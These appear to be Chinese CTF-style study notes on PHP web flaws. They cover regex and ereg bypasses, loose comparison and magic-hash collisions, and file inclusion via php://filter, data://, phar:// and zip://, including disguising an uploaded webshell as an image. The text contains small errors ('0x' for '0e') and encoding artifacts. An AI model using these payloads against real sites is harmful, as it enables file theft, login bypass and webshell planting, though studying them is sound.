正則表達式

preg_match
如果在進行正則表達式匹配的時候，沒有限制字符串的開始和結束(^ 和 $)，則可以存在繞過的問題

$ip = '1.1.1.1 abcd'; // 可以繞過
if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) {
  die('error');
} else {
  // echo('key...')
}

ereg %00 截斷
ereg 讀到 %00 的時候，就截止了

<?php
    if (ereg ("^[a-zA-Z]+$", $_GET['a']) === FALSE)  {
        echo 'You password must be alphabet';
    }
?>

a=abcd%001234，可以繞過
ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE
字符串對比解析
在這里如果 $_GET[‘password’]為數組，則返回值為NULL
如果為123 || asd || 12as || 123%00&&&**，則返回值為true
其余為false

字符串比較

<?php  
    echo 0 == 'a' ;// a 轉換為數字為 0    重點注意
    // 0x 開頭會被當成16進制54975581388的16進制為 0xccccccccc
    // 十六進制與整數，被轉換為同一進制比較
    '0xccccccccc' == '54975581388' ;

    // 字符串在與數字比較前會自動轉換為數字，如果不能轉換為數字會變成0
    1 == '1';
    1 == '01';
    10 == '1e1';
    '100' == '1e2' ;    

    // 十六進制數與帶空格十六進制數，被轉換為十六進制整數
    '0xABCdef'  == '     0xABCdef';
    echo '0010e2' == '1e3';
    // 0e 開頭會被當成數字，又是等于 0*10^xxx=0
    // 如果 md5 是以 0e 開頭，在做比較的時候，可以用這種方法繞過
    '0e509367213418206700842008763514' == '0e481036490867661113260034900752';
    '0e481036490867661113260034900752' == '0' ;

    var_dump(md5('240610708') == md5('QNKCDZO'));
    var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
    var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
    var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
?>

文件包含

http://127.0.0.1/index.php?page=upload
這種 url 很容易就能想到可能是文件包含或者偽協議讀取
http://127.0.0.1/index.php?page=php://filter/read=convert.base64-encode/resource=upload

偽協議

php://filter

讀取文件

index.php?file=php://filter/convert.base64-encode/resource=flag.php
index.php?file=php://filter/read=convert.base64-encode/resource=flag.php

php://input

寫入文件， 數據利用 POST 傳過去

index.php?file=php://input

data://

將 include 的文件流重定向到用戶控制的輸入流
test.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpO2V4aXQoKTsvLw==
可以用于控制 file_get_contents 的內容為用戶輸入的流

$file=$_GET['file'];
$data = @file_get_contents($a,'r');
echo $data;

phar://

發(fā)現有一個文件上傳功能，無法繞過，僅能上傳jpg后綴的文件。與此同時，無法進行文件包含截斷。allow_url_include=on 的狀態(tài)下，就可以考慮phar偽協議繞過。
寫一個shell.php文件，里面包含一句話木馬。然后，壓縮成xxx.zip。然后改名為xxx.jpg進行上傳。最后使用phar進行包含
這里的路徑為上傳的 jpg 文件在服務器的路徑
/index.php?id=phar://路徑/xxx.jpg/shell

zip://

上述 phar:// 的方法也可以使用 zip://
然后吧1.php文件壓縮成zip，再把zip的后綴改為png，上傳上去，并且可以獲得上傳上去的png的地址。
1.zip文件內僅有1.php這個文件

/php?file=zip://1.png%231.php  
// 也可以嘗試不改名為png，直接使用zip上傳測試一下
/php?file=zip://1.zip%231.php

MD5 compare漏洞

PHP在處理哈希字符串時，如果利用”!=”或”==”來對哈希值進行比較，它把每一個以”0x”開頭的哈希值都解釋為科學計數法0的多少次方（為0），所以如果兩個不同的密碼經過哈希以后，其哈希值都是以”0e”開頭的，那么php將會認為他們相同。
常見的payload有

0x01 md5(str)
    QNKCDZO
    240610708
    s878926199a
    s155964671a
    s214587387a
    s214587387a
0x02 sha1(str)
    sha1('aaroZmOk')  
    sha1('aaK1STfY')
    sha1('aaO8zKZF')
    sha1('aa3OFF9m')

同時MD5不能處理數組，若有以下判斷則可用數組繞過

if(@md5($_GET['a']) == @md5($_GET['b']))
{
    echo "yes";
}
//http://127.0.0.1/1.php?a[]=1&b[]=2

變量覆蓋